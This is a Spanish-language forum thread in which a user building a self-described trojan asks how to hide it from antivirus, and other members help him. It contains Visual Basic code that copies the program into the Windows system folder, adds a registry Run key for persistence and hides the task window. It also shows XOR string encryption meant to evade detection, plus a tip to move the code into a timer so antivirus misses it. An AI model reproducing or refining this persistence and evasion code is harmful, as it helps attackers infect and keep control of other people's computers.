expliquenme como cifrar o diganme si estoy bien... porfavor

[Belial & Grimoire]

hola

estoy leyendo por primera vez el metodo de enciptacion... y no he logrado entender bien..

a ver..

primero tengo que crear un programa que me encripte por strings .. pero que?

es acaso los codigos de mi programa.. el nombre de mi programa o que?

creo que es... los codigos de mi programa... pero mejor diganme uds...

luego tengo que crear una funcion que desencripte los codigo al ejecutarlo para que puedan ser interpretados por las computadoras y que funcione mi programa... esto es cierto o tambien me equivoco?

y si las dos son ciertas... entre mas codigo cifrado tenga, menos posibilidades de ser detectado por los antivirus es mi troyano?...

espero su respuesta

gracias 

P.D. cuales son las funciones de los worm?.. o en otras palabras como funcionan?... acaso sirven para unirse a otros programas para no ser detectados tan facilmente o para que sirven...?

[~~]

Vamos a ver tu tienes que tener dos funciones. Una q enkripte y otra que desencripte. Entonces tu imaginate q tienes una cadena que es detectada por el AV, por ejemplo la de añadirse al registro. Lo que tienes que hacer es cifrar la cadena para añadirse al reg con tu funcion encriptadora, todo esto en un programa independiente, imagina q la cadena cifrada que obtienes es esto "SDFS54sdf35435216%&$%&" pues ahora desde tu worm tienes que llamar a la funcion para añadir al reg con esa cadena. Por ej, imagina q la funcion para añadir al reg se llama "Reg" y la funcion para descifrar "descifra", pues tienes que llamarla así:

Código [Seleccionar] Expandir

Reg (descifra("SDFS54sdf35435216%&$%&"))

P.D. cuales son las funciones de los worm?.. o en otras palabras como funcionan?... acaso sirven para unirse a otros programas para no ser detectados tan facilmente o para que sirven...?

http://es.wikipedia.org/wiki/Gusano_inform%C3%A1tico

[Belial & Grimoire]

hola

Ahh.. ok..

gracias por la info... solo tengo otra duda...

se puede cifrar cualquier codigo... o no todo...

ya que intente cifrar el clasico App.TaskVisible = False pero no supe como colocarlo para que me funcionara...

Tambien intente hacer esto... pero tampoco funciona

Código [Seleccionar] Expandir



Dim win
Dim sys
Dim residencia
ejec = App.path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ejec, sys & "\programa"
Name sys & "\programa" As sys & "\programa.exe"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"
App.TaskVisible = False


intente encriptarlo con un codigo que encontre... es este

Código [Seleccionar] Expandir


Private Sub Command1_Click()
Dim TextoAux As String, Texto As String
    Dim I As Integer
    Texto = ""
    TextoAux1 = Text1.Text
    For I = 1 To Len(TextoAux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        Texto = Texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
    Text1.Text = Texto

End Sub




pero al encriptarlo no puedo hacer que se desencripte para que funcione.. intente modificarlo como lo que puse abajo y funciona para desencriptarlo, pero al ejecutarlo  ya no funciona... y esto es lo que me detecta el antivirus

Código [Seleccionar] Expandir



"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"
App.TaskVisible = False


y si hago esto el codigo funciona

Código [Seleccionar] Expandir



Private Sub Form_Load()
decrypt ("\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH64246df{sfuyu684gmg4246Hdf{sfuyu:qlq")
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Esto:

\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH64246df{sfuyu684gmg4246Hdf{sfuyu:qlq

ES ESTO...

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Private function decrypt(text2  as string)
Dim TextoAux As String, texto As String
    Dim I As Integer
    texto = ""
    Text1.Text = text2
    textoaux1 = Text1.Text
    For I = 1 To Len(textoaux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        texto = texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
text1.text = texto
End Function



y no se si tenga que kedar asi...

Código [Seleccionar] Expandir


Private function decrypt(text2  as string)
Dim TextoAux As String, texto As String
    Dim I As Integer
    texto = ""
    Text1.Text = text2
    textoaux1 = Text1.Text
    For I = 1 To Len(textoaux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        texto = texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
Dim win
Dim sys
Dim residencia
ejec = App.path
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"
ejec = ejec & App.EXEName & ".exe"
Set obj = CreateObject("Scripting.FileSystemObject")
Set win = obj.GetSpecialFolder(0)
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)
sys = LCase(sys)
FileCopy ejec, sys & "\programa"
Name sys & "\programa" As sys & "\programa.exe"
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite texto
app.taskvisibe= false



pero al ejecutarlo... no funciona... alguien sabe porke?

[~~]

Eso no lo puedes cifrar  Lo q se encriptan son las cadenas, lo q va entre " " 
Si el AV te detecta eso, ponlo en un timer con intervaleo 1 en vez de en el form load y veras como no te lo detecta

[HaDeS, -]

Código (vb) [Seleccionar] Expandir


Private Sub Command1_Click()
Dim TextoAux As String, Texto As String
    Dim I As Integer
    Texto = ""
    TextoAux1 = Text1.Text
    For I = 1 To Len(TextoAux1)
        Text1.SelStart = I - 1
        Text1.SelLength = 1
        TextoAux = Text1.SelText
        Texto = Texto + Chr$(Asc(TextoAux) Xor 20)
    Next I
    Text1.Text = Texto

End Sub



Ese sub lo podes traducir a la funcion cifra como

Código (vb) [Seleccionar] Expandir


Private Function Destripa(Texto As String) As String
Dim Texto2$
For i = 1 To Len(Texto)
    Texto2 = Texto2 & Chr$(Asc(Mid(Texto, i, 1)) Xor 20)
Next i
Destripa= Texto2
End Function


A lo que

Código (vb) [Seleccionar] Expandir


residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa", sys & "\programa.exe"


vendria siendo

Código (vb) [Seleccionar] Expandir


residencia.RegWrite Destripa("\_QMKWAFFQZ@KAGQFHG{r`cufqHY}wf{g{r`HC}zp{cgHWaffqz`Bqfg}{zHFazH") & Destripa("df{sfuyu"), sys & Destripa("Hdf{sfuyu:qlq")


Una pregunta

Código (vb) [Seleccionar] Expandir


"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "programa"

Porque no unes esas dos cadenas ?, o acaso programa es una variable ?

Saludos

[Belial & Grimoire]

hola

jeje.. tienen razon, solamente lo que va entre " "  es lo que se puede cifrar....

y ya lo intente y ya logre solucionarlo...

y la funcion de hades.. esta mas simple... voy aver que tal me va...

gracias por la ayuda